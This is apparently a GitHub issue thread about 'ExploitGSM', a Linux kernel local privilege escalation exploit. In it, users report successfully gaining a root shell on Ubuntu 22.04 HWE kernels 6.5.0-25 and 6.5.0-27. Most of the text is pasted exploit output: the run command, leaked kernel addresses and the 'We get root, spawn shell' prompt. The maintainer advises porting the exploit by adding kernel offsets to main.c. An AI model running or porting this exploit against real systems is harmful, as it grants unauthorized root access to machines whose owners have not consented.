Closed lehrhardt-tarent closed 6 months ago
No you should just add new kernel offsets on exploits
Ok, understood. I've added matching kernel offsets for 6.5.0-27 in main.c and recompiled and the exploit also works with the latest ubuntu hwe package then:
./ExploitGSM ubuntu-27
permissible spray -> 500
begin try leak startup_xen!
startup_xen leaked address -> ffffffff8ce933d0
text leaked address -> ffffffff8a800000
lockdep_map_size -> 32
spinlock_t_size -> 4
mutex_size -> 32
tty port -> 376
tty buffhead -> 136
dead -> 524
waiting setconf dlci thread
Wait 3 sec for ending kernel work execution
We get root, spawn shell
To run a command as administrator (user "root"), use "sudo
root@machine:/root# uname -a Linux machine 6.5.0-27-generic #28~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 15 10:51:06 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
cool
Hey,
with your latest commits, the ExploitGSM6_5 compiles under Ubuntu 22.04 successfully. The exploit was successful with kernel package version 6.5.0-25 on my machine:
begin try leak startup_xen! startup_xen leaked address -> ffffffffbc6933c0 text leaked address -> ffffffffba000000 lockdep_map_size -> 32 spinlock_t_size -> 4 mutex_size -> 32 tty port -> 376 tty buffhead -> 136 dead -> 524 waiting setconf dlci thread Wait 3 sec for ending kernel work execution We get root, spawn shell To run a command as administrator (user "root"), use "sudo".
See "man sudo_root" for details.
root@machine:/root# uname -a Linux machine 6.5.0-25-generic #25~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Feb 20 16:09:15 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
The latest kernel package is 6.5.0-27 with Ubuntu 22.04 HWE version. If you adjust main.c to match kernel package version 6.5.0-27 the exploit can be executed. However, it just fails. Is the exploit limited to ubuntu 6.5.0-25 package and 6.5.0-27 is safe?